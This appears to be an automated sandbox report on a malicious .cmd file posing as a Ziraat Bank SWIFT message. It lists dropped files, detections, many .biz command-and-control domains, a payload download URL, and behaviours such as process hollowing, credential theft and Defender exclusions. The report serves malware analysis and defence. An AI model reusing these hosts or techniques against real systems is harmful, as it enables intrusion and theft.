                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557469 Sample: Ziraat_Bankasi_Swift_Mesaji... Startdate: 18/11/2024 Architecture: WINDOWS Score: 100 123 zyiexezl.biz 2->123 125 yhqqc.biz 2->125 127 129 other IPs or domains 2->127 143 Suricata IDS alerts for network traffic 2->143 145 Found malware configuration 2->145 147 Malicious sample detected (through community Yara rule) 2->147 149 18 other signatures 2->149 11 alg.exe 2->11         started        16 cmd.exe 1 2->16         started        18 Juqmtmya.PIF 2->18         started        20 5 other processes 2->20 signatures3 process4 dnsIp5 137 zyiexezl.biz 18.208.156.248, 50016, 50030, 50035 AMAZON-AESUS United States 11->137 139 fgajqjyhr.biz 34.211.97.45, 50027, 50039, 50042 AMAZON-02US United States 11->139 141 14 other IPs or domains 11->141 115 C:\Program Files\...\updater.exe, PE32+ 11->115 dropped 117 C:\Program Files\...\private_browsing.exe, PE32+ 11->117 dropped 119 C:\Program Files\...\plugin-container.exe, PE32+ 11->119 dropped 121 127 other malicious files 11->121 dropped 195 Creates files in the system32 config directory 11->195 197 Drops executable to a common third party application directory 11->197 199 Infects executable files (exe, dll, sys, html) 11->199 22 AnyDesk.PIF 1 7 16->22         started        27 extrac32.exe 1 16->27         started        29 alpha.exe 1 16->29         started        35 5 other processes 16->35 201 Writes to foreign memory regions 18->201 203 Allocates memory in foreign processes 18->203 205 Sample uses process hollowing technique 18->205 31 aymtmquJ.pif 18->31         started        33 aymtmquJ.pif 20->33         started        file6 signatures7 process8 dnsIp9 129 gxe0.com 198.252.105.91, 443, 49730, 49731 HAWKHOSTCA Canada 22->129 93 C:\Users\Public\Libraries\aymtmquJ.pif, PE32 22->93 dropped 95 C:\Users\Public\Libraries\Juqmtmya, data 22->95 dropped 97 C:\Users\Public\Juqmtmya.url, MS 22->97 dropped 161 Drops PE files with a suspicious file extension 22->161 163 Writes to foreign memory regions 22->163 165 Allocates memory in foreign processes 22->165 173 2 other signatures 22->173 37 aymtmquJ.pif 4 22->37         started        41 cmd.exe 1 22->41         started        43 esentutl.exe 2 22->43         started        99 C:\Users\Public\alpha.exe, PE32+ 27->99 dropped 167 Drops PE files to the user root directory 27->167 169 Drops or copies certutil.exe with a different name (likely to bypass HIPS) 27->169 171 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 27->171 45 kn.exe 3 2 29->45         started        47 Native_neworigin.exe 31->47         started        49 Trading_AIBot.exe 31->49         started        51 kn.exe 2 35->51         started        53 extrac32.exe 1 35->53         started        file10 signatures11 process12 file13 81 C:\Users\user\AppData\...\Trading_AIBot.exe, PE32 37->81 dropped 83 C:\Users\user\...83ative_neworigin.exe, PE32 37->83 dropped 85 C:\Program Files (x86)\...\armsvc.exe, PE32 37->85 dropped 151 Drops executable to a common third party application directory 37->151 153 Infects executable files (exe, dll, sys, html) 37->153 55 Native_neworigin.exe 37->55         started        60 Trading_AIBot.exe 37->60         started        62 esentutl.exe 2 41->62         started        64 esentutl.exe 2 41->64         started        66 conhost.exe 41->66         started        87 C:\Users\Public\Libraries\Juqmtmya.PIF, PE32 43->87 dropped 68 conhost.exe 43->68         started        155 Registers a new ROOT certificate 45->155 157 Drops PE files with a suspicious file extension 45->157 89 C:\Users\Public\Libraries\AnyDesk.PIF, PE32 51->89 dropped 91 C:\Users\Public\kn.exe, PE32+ 53->91 dropped signatures14 process15 dnsIp16 131 cvgrf.biz 54.244.188.177, 49801, 49817, 49830 AMAZON-02US United States 55->131 133 s82.gocheapweb.com 51.195.88.199, 49859, 49884, 49961 OVHFR France 55->133 135 6 other IPs or domains 55->135 101 C:\Windows\System32\alg.exe, PE32+ 55->101 dropped 103 C:\Windows\System32\FXSSVC.exe, PE32+ 55->103 dropped 105 DiagnosticsHub.Sta...llector.Service.exe, PE32+ 55->105 dropped 107 C:\Windows\System32\AppVClient.exe, PE32+ 55->107 dropped 175 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 55->175 177 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 55->177 179 Tries to steal Mail credentials (via file / registry access) 55->179 193 4 other signatures 55->193 109 C:\Users\user\AppData\Roaming\...\apihost.exe, PE32 60->109 dropped 181 Uses schtasks.exe or at.exe to add and modify task schedules 60->181 183 Drops large PE files 60->183 185 Adds a directory exclusion to Windows Defender 60->185 70 powershell.exe 60->70         started        73 schtasks.exe 60->73         started        111 C:\Users\Public\alpha.pif, PE32 62->111 dropped 187 Drops PE files to the user root directory 62->187 189 Drops PE files with a suspicious file extension 62->189 191 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 62->191 113 C:\Users\Public\xpha.pif, PE32 64->113 dropped file17 signatures18 process19 signatures20 159 Loading BitLocker PowerShell Module 70->159 75 conhost.exe 70->75         started        77 WmiPrvSE.exe 70->77         started        79 conhost.exe 73->79         started        process21

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd13%ReversingLabsScript-BAT.Trojan.Remcos

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                      C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      No Antivirus matches

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      uaafd.biz
                      		3.254.94.185
                      		truefalse
                        xnxvnn.biz
                        		13.251.16.150
                        		truefalse
                          nlscndwp.biz
                          		54.244.188.177
                          		truetrue
                            vjaxhpbji.biz
                            		82.112.184.197
                            		truefalse
                              s82.gocheapweb.com
                              		51.195.88.199
                              		truefalse
                                ytctnunms.biz
                                		3.94.10.34
                                		truefalse
                                  qncdaagct.biz
                                  		47.129.31.212
                                  		truefalse
                                    ctdtgwag.biz
                                    		3.94.10.34
                                    		truefalse
                                      tbjrpv.biz
                                      		34.246.200.160
                                      		truefalse
                                        kcyvxytog.biz
                                        		18.208.156.248
                                        		truetrue
                                          ereplfx.biz
                                          		18.246.231.120
                                          		truefalse
                                            apzzls.biz
                                            		34.211.97.45
                                            		truetrue
                                              sxmiywsfv.biz
                                              		13.251.16.150
                                              		truefalse
                                                pgfsvwx.biz
                                                		18.208.156.248
                                                		truetrue
                                                  przvgke.biz
                                                  		172.234.222.143
                                                  		truefalse
                                                    ocsvqjg.biz
                                                    		3.254.94.185
                                                    		truefalse
                                                      ecxbwt.biz
                                                      		54.244.188.177
                                                      		truetrue
                                                        bghjpy.biz
                                                        		34.211.97.45
                                                        		truetrue
                                                          damcprvgv.biz
                                                          		18.208.156.248
                                                          		truetrue
                                                            gnqgo.biz
                                                            		18.208.156.248
                                                            		truetrue
                                                              tltxn.biz
                                                              		18.208.156.248
                                                              		truetrue
                                                                deoci.biz
                                                                		18.208.156.248
                                                                		truetrue
                                                                  krnsmlmvd.biz
                                                                  		47.129.31.212
                                                                  		truefalse
                                                                    uevrpr.biz
                                                                    		18.246.231.120
                                                                    		truefalse
                                                                      hagujcj.biz
                                                                      		18.208.156.248
                                                                      		truetrue
                                                                        gxe0.com
                                                                        		198.252.105.91
                                                                        		truetrue
                                                                          bumxkqgxu.biz
                                                                          		44.221.84.105
                                                                          		truefalse
                                                                            yhqqc.biz
                                                                            		34.211.97.45
                                                                            		truetrue
                                                                              ltpqsnu.biz
                                                                              		18.208.156.248
                                                                              		truetrue
                                                                                api.ipify.org
                                                                                		104.26.13.205
                                                                                		truefalse
                                                                                  sctmku.biz
                                                                                  		35.164.78.200
                                                                                  		truefalse
                                                                                    gcedd.biz
                                                                                    		13.251.16.150
                                                                                    		truefalse
                                                                                      wxgzshna.biz
                                                                                      		72.52.178.23
                                                                                      		truefalse
                                                                                        oshhkdluh.biz
                                                                                        		54.244.188.177
                                                                                        		truetrue
                                                                                          opowhhece.biz
                                                                                          		18.208.156.248
                                                                                          		truetrue
                                                                                            pectx.biz
                                                                                            		18.246.231.120
                                                                                            		truefalse
                                                                                              jwkoeoqns.biz
                                                                                              		18.208.156.248
                                                                                              		truetrue
                                                                                                jpskm.biz
                                                                                                		34.211.97.45
                                                                                                		truetrue
                                                                                                  cjvgcl.biz
                                                                                                  		18.208.156.248
                                                                                                  		truetrue
                                                                                                    ifsaia.biz
                                                                                                    		13.251.16.150
                                                                                                    		truefalse
                                                                                                      rynmcq.biz
                                                                                                      		54.244.188.177
                                                                                                      		truetrue
                                                                                                        fjumtfnz.biz
                                                                                                        		34.211.97.45
                                                                                                        		truetrue
                                                                                                          dyjdrp.biz
                                                                                                          		54.244.188.177
                                                                                                          		truetrue
                                                                                                            ypituyqsq.biz
                                                                                                            		3.94.10.34
                                                                                                            		truefalse
                                                                                                              tnevuluw.biz
                                                                                                              		35.164.78.200
                                                                                                              		truefalse
                                                                                                                znwbniskf.biz
                                                                                                                		47.129.31.212
                                                                                                                		truefalse
                                                                                                                  ijnmvqa.biz
                                                                                                                  		35.164.78.200
                                                                                                                  		truefalse
                                                                                                                    saytjshyf.biz
                                                                                                                    		44.221.84.105
                                                                                                                    		truefalse
                                                                                                                      rrqafepng.biz
                                                                                                                      		47.129.31.212
                                                                                                                      		truefalse
                                                                                                                        aatcwo.biz
                                                                                                                        		47.129.31.212
                                                                                                                        		truefalse
                                                                                                                          uphca.biz
                                                                                                                          		44.221.84.105
                                                                                                                          		truefalse
                                                                                                                            htwqzczce.biz
                                                                                                                            		172.234.222.143
                                                                                                                            		truefalse
                                                                                                                              xyrgy.biz
                                                                                                                              		18.208.156.248
                                                                                                                              		truetrue
                                                                                                                                banwyw.biz
                                                                                                                                		44.221.84.105
                                                                                                                                		truefalse
                                                                                                                                  myups.biz
                                                                                                                                  		165.160.15.20
                                                                                                                                  		truefalse
                                                                                                                                    pwlqfu.biz
                                                                                                                                    		34.246.200.160
                                                                                                                                    		truefalse
                                                                                                                                      zyiexezl.biz
                                                                                                                                      		18.208.156.248
                                                                                                                                      		truetrue
                                                                                                                                        hlzfuyy.biz
                                                                                                                                        		34.211.97.45
                                                                                                                                        		truetrue
                                                                                                                                          ssbzmoy.biz
                                                                                                                                          		18.141.10.107
                                                                                                                                          		truefalse
                                                                                                                                            knjghuig.biz
                                                                                                                                            		18.141.10.107
                                                                                                                                            		truefalse
                                                                                                                                              yunalwv.biz
                                                                                                                                              		208.100.26.245
                                                                                                                                              		truefalse
                                                                                                                                                brsua.biz
                                                                                                                                                		3.254.94.185
                                                                                                                                                		truefalse
                                                                                                                                                  mgmsclkyu.biz
                                                                                                                                                  		34.246.200.160
                                                                                                                                                  		truefalse
                                                                                                                                                    cpclnad.biz
                                                                                                                                                    		44.221.84.105
                                                                                                                                                    		truefalse
                                                                                                                                                      ptrim.biz
                                                                                                                                                      		18.141.10.107
                                                                                                                                                      		truefalse
                                                                                                                                                        ihcnogskt.biz
                                                                                                                                                        		35.164.78.200
                                                                                                                                                        		truefalse
                                                                                                                                                          qpnczch.biz
                                                                                                                                                          		18.246.231.120
                                                                                                                                                          		truefalse
                                                                                                                                                            mnjmhp.biz
                                                                                                                                                            		47.129.31.212
                                                                                                                                                            		truefalse
                                                                                                                                                              acwjcqqv.biz
                                                                                                                                                              		18.141.10.107
                                                                                                                                                              		truefalse
                                                                                                                                                                zrlssa.biz
                                                                                                                                                                		44.221.84.105
                                                                                                                                                                		truefalse
                                                                                                                                                                  pywolwnvd.biz
                                                                                                                                                                  		54.244.188.177
                                                                                                                                                                  		truetrue
                                                                                                                                                                    mjheo.biz
                                                                                                                                                                    		44.221.84.105
                                                                                                                                                                    		truefalse
                                                                                                                                                                      lrxdmhrr.biz
                                                                                                                                                                      		54.244.188.177
                                                                                                                                                                      		truetrue
                                                                                                                                                                        vrrazpdh.biz
                                                                                                                                                                        		34.211.97.45
                                                                                                                                                                        		truetrue
                                                                                                                                                                          cikivjto.biz
                                                                                                                                                                          		18.246.231.120
                                                                                                                                                                          		truefalse
                                                                                                                                                                            fgajqjyhr.biz
                                                                                                                                                                            		34.211.97.45
                                                                                                                                                                            		truetrue
                                                                                                                                                                              hehckyov.biz
                                                                                                                                                                              		44.221.84.105
                                                                                                                                                                              		truefalse
                                                                                                                                                                                kkqypycm.biz
                                                                                                                                                                                		18.141.10.107
                                                                                                                                                                                		truefalse
                                                                                                                                                                                  bzkysubds.biz
                                                                                                                                                                                  		3.94.10.34
                                                                                                                                                                                  		truefalse
                                                                                                                                                                                    xlfhhhm.biz
                                                                                                                                                                                    		47.129.31.212
                                                                                                                                                                                    		truefalse
                                                                                                                                                                                      warkcdu.biz
                                                                                                                                                                                      		18.141.10.107
                                                                                                                                                                                      		truefalse
                                                                                                                                                                                        npukfztj.biz
                                                                                                                                                                                        		44.221.84.105
                                                                                                                                                                                        		truefalse
                                                                                                                                                                                          dwrqljrr.biz
                                                                                                                                                                                          		54.244.188.177
                                                                                                                                                                                          		truetrue
                                                                                                                                                                                            gytujflc.biz
                                                                                                                                                                                            		208.100.26.245
                                                                                                                                                                                            		truefalse
                                                                                                                                                                                              gvijgjwkh.biz
                                                                                                                                                                                              		3.94.10.34
                                                                                                                                                                                              		truefalse
                                                                                                                                                                                                sewlqwcd.biz
                                                                                                                                                                                                		44.221.84.105
                                                                                                                                                                                                		truefalse
                                                                                                                                                                                                  vnvbt.biz
                                                                                                                                                                                                  		18.246.231.120
                                                                                                                                                                                                  		truefalse
                                                                                                                                                                                                    nwdnxrd.biz
                                                                                                                                                                                                    		54.244.188.177
                                                                                                                                                                                                    		truetrue
                                                                                                                                                                                                      qvuhsaqa.biz
                                                                                                                                                                                                      		54.244.188.177
                                                                                                                                                                                                      		truetrue
                                                                                                                                                                                                        iuzpxe.biz
                                                                                                                                                                                                        		13.251.16.150
                                                                                                                                                                                                        		truefalse
                                                                                                                                                                                                          nqwjmb.biz
                                                                                                                                                                                                          		35.164.78.200
                                                                                                                                                                                                          		truefalse
                                                                                                                                                                                                            wllvnzb.biz
                                                                                                                                                                                                            		18.141.10.107
                                                                                                                                                                                                            		truefalse
                                                                                                                                                                                                              kvbjaur.biz
                                                                                                                                                                                                              		54.244.188.177
                                                                                                                                                                                                              		truetrue
                                                                                                                                                                                                                napws.biz
                                                                                                                                                                                                                		35.164.78.200
                                                                                                                                                                                                                		truefalse
                                                                                                                                                                                                                  cvgrf.biz
                                                                                                                                                                                                                  		54.244.188.177
                                                                                                                                                                                                                  		truetrue
                                                                                                                                                                                                                    lpuegx.biz
                                                                                                                                                                                                                    		82.112.184.197
                                                                                                                                                                                                                    		truefalse
                                                                                                                                                                                                                      vcddkls.biz
                                                                                                                                                                                                                      		18.141.10.107
                                                                                                                                                                                                                      		truefalse
                                                                                                                                                                                                                        wluwplyh.biz
                                                                                                                                                                                                                        		18.141.10.107
                                                                                                                                                                                                                        		truefalse
                                                                                                                                                                                                                          vyome.biz
                                                                                                                                                                                                                          		18.246.231.120
                                                                                                                                                                                                                          		truefalse
                                                                                                                                                                                                                            dlynankz.biz
                                                                                                                                                                                                                            		85.214.228.140
                                                                                                                                                                                                                            		truefalse

                                                                                                                                                                                                                              Contacted URLs

                                                                                                                                                                                                                              NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                              http://typgfhb.biz/xrfalse
                                                                                                                                                                                                                                http://oshhkdluh.biz/actrue
                                                                                                                                                                                                                                  http://ecxbwt.biz/qaurkicngfeytatrue
                                                                                                                                                                                                                                    http://aatcwo.biz/gkxkncupxffalse
                                                                                                                                                                                                                                      http://ypituyqsq.biz/lxhiearhlrgyqfalse
                                                                                                                                                                                                                                        http://whjovd.biz/eopafalse
                                                                                                                                                                                                                                          http://fwiwk.biz/slpstmitttatqvfalse
                                                                                                                                                                                                                                            http://npukfztj.biz/jnekfalse
                                                                                                                                                                                                                                              http://vjaxhpbji.biz/awclfrtxgvufalse
                                                                                                                                                                                                                                                http://bumxkqgxu.biz/ybnjtwgoifalse
                                                                                                                                                                                                                                                  http://cvgrf.biz/bxbtrue
                                                                                                                                                                                                                                                    http://oflybfv.biz/eiatwbrknxjfalse
                                                                                                                                                                                                                                                      http://wxgzshna.biz/qjhbufalse
                                                                                                                                                                                                                                                        http://jlqltsjvh.biz/illrgnebnfalse
                                                                                                                                                                                                                                                          http://warkcdu.biz/lxqioaycfalse
                                                                                                                                                                                                                                                            http://wxgzshna.biz/hgfalse
                                                                                                                                                                                                                                                              http://gytujflc.biz/xfffiesfsefalse
                                                                                                                                                                                                                                                                http://warkcdu.biz/avkhmehufiifalse
                                                                                                                                                                                                                                                                  http://jdhhbs.biz/ekicmdatgfalse
                                                                                                                                                                                                                                                                    http://dyjdrp.biz/npvetrue
                                                                                                                                                                                                                                                                      http://ftxlah.biz/efnfkaqjisfwrsutfalse
                                                                                                                                                                                                                                                                        http://oflybfv.biz/ikgnytocxhbnfalse
                                                                                                                                                                                                                                                                          http://ihcnogskt.biz/sclfhiiabfalse
                                                                                                                                                                                                                                                                            http://qncdaagct.biz/uwxvqmmhftfalse
                                                                                                                                                                                                                                                                              http://ihcnogskt.biz/etrfvwacvfalse
                                                                                                                                                                                                                                                                                http://zrlssa.biz/ryyevidfyfalse
                                                                                                                                                                                                                                                                                  http://przvgke.biz/jieanryejufrqdpfalse
                                                                                                                                                                                                                                                                                    http://vgypotwp.biz/wqgsaraaxlbotrue
                                                                                                                                                                                                                                                                                      http://pywolwnvd.biz/obvywkjretrue
                                                                                                                                                                                                                                                                                        http://htwqzczce.biz/spfkautpyscpmfalse
                                                                                                                                                                                                                                                                                          http://ypituyqsq.biz/fpsoixfgfcsskwmxfalse
                                                                                                                                                                                                                                                                                            http://esuzf.biz/dqqtqvvcpfgtdcttrue
                                                                                                                                                                                                                                                                                              http://eufxebus.biz/fxciiefalse
                                                                                                                                                                                                                                                                                                http://bghjpy.biz/aetrue
                                                                                                                                                                                                                                                                                                  http://damcprvgv.biz/hbtrue
                                                                                                                                                                                                                                                                                                    http://ssbzmoy.biz/wnrmxkwfalse
                                                                                                                                                                                                                                                                                                      http://rynmcq.biz/qwitrue
                                                                                                                                                                                                                                                                                                        http://ijnmvqa.biz/vxcffalse
                                                                                                                                                                                                                                                                                                          http://saytjshyf.biz/kvaefalse
                                                                                                                                                                                                                                                                                                            http://vyome.biz/stfalse
                                                                                                                                                                                                                                                                                                              http://cvgrf.biz/gcjwtnotrue
                                                                                                                                                                                                                                                                                                                http://wluwplyh.biz/srlfalse
                                                                                                                                                                                                                                                                                                                  http://ywffr.biz/eqdqnwttrue
                                                                                                                                                                                                                                                                                                                    http://qaynky.biz/glmweuqqfalse
                                                                                                                                                                                                                                                                                                                      http://vjaxhpbji.biz/oaffalse
                                                                                                                                                                                                                                                                                                                        http://vcddkls.biz/pjihilgkvncwcevmfalse
                                                                                                                                                                                                                                                                                                                          http://cpclnad.biz/hrbxofalse
                                                                                                                                                                                                                                                                                                                            http://deoci.biz/eaufcaidikagtrue
                                                                                                                                                                                                                                                                                                                              http://htwqzczce.biz/gpxgnogudnwutwfpfalse
                                                                                                                                                                                                                                                                                                                                http://yauexmxk.biz/vommasbpmwjrwotrue
                                                                                                                                                                                                                                                                                                                                  http://lpuegx.biz/ynekytqvwifwsqdfalse
                                                                                                                                                                                                                                                                                                                                    http://fjumtfnz.biz/mogtrue
                                                                                                                                                                                                                                                                                                                                      http://bzkysubds.biz/ujdfhltfalse
                                                                                                                                                                                                                                                                                                                                        http://fwiwk.biz/mndfsbyfnglsmfalse
                                                                                                                                                                                                                                                                                                                                          https://gxe0.com/yak2/233_Juqmtmyadyytrue
                                                                                                                                                                                                                                                                                                                                            https://api.ipify.org/false
                                                                                                                                                                                                                                                                                                                                              http://vcddkls.biz/kxeknkvhxjifdfalse
                                                                                                                                                                                                                                                                                                                                                http://bzkysubds.biz/slunaqsqihiynfalse
                                                                                                                                                                                                                                                                                                                                                  http://gcedd.biz/cckxgccommwfalse
                                                                                                                                                                                                                                                                                                                                                    http://pywolwnvd.biz/nkrerhrntrue
                                                                                                                                                                                                                                                                                                                                                      http://knjghuig.biz/bfkrntjfalse
                                                                                                                                                                                                                                                                                                                                                        http://myups.biz/ljefalse
                                                                                                                                                                                                                                                                                                                                                          http://fjumtfnz.biz/onpettusmtrue
                                                                                                                                                                                                                                                                                                                                                            http://przvgke.biz/mdvfalse
                                                                                                                                                                                                                                                                                                                                                              http://lpuegx.biz/yjjloqhjfalse
                                                                                                                                                                                                                                                                                                                                                                http://mgmsclkyu.biz/nbfalse
                                                                                                                                                                                                                                                                                                                                                                  http://lpuegx.biz/llpilismcsqqsdfalse
                                                                                                                                                                                                                                                                                                                                                                    http://mjheo.biz/bvahqiwvfalse
                                                                                                                                                                                                                                                                                                                                                                      http://jwkoeoqns.biz/fddxbhbtrue
                                                                                                                                                                                                                                                                                                                                                                        http://hehckyov.biz/offalse
                                                                                                                                                                                                                                                                                                                                                                          http://shpwbsrw.biz/dlpiplovberhglfalse
                                                                                                                                                                                                                                                                                                                                                                            http://nqwjmb.biz/uahjpnfalse
                                                                                                                                                                                                                                                                                                                                                                              http://ytctnunms.biz/awlvfalse
                                                                                                                                                                                                                                                                                                                                                                                http://hlzfuyy.biz/ohhtrue
                                                                                                                                                                                                                                                                                                                                                                                  http://yunalwv.biz/twarfxyjhxfalse
                                                                                                                                                                                                                                                                                                                                                                                    http://gvijgjwkh.biz/wpbyxwfalse
                                                                                                                                                                                                                                                                                                                                                                                      http://gjogvvpsf.biz/qdahfalse
                                                                                                                                                                                                                                                                                                                                                                                        http://ssbzmoy.biz/qdfalse
                                                                                                                                                                                                                                                                                                                                                                                          http://cvgrf.biz/lqbpdlmeudihjsyytrue
                                                                                                                                                                                                                                                                                                                                                                                            http://dlynankz.biz/jfalse

                                                                                                                                                                                                                                                                                                                                                                                              URLs from Memory and Binaries

                                                                                                                                                                                                                                                                                                                                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                                                                                                                                                                                              http://18.141.10.107/Palg.exe, 0000001D.00000003.2825140838.000000000055D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpfalse
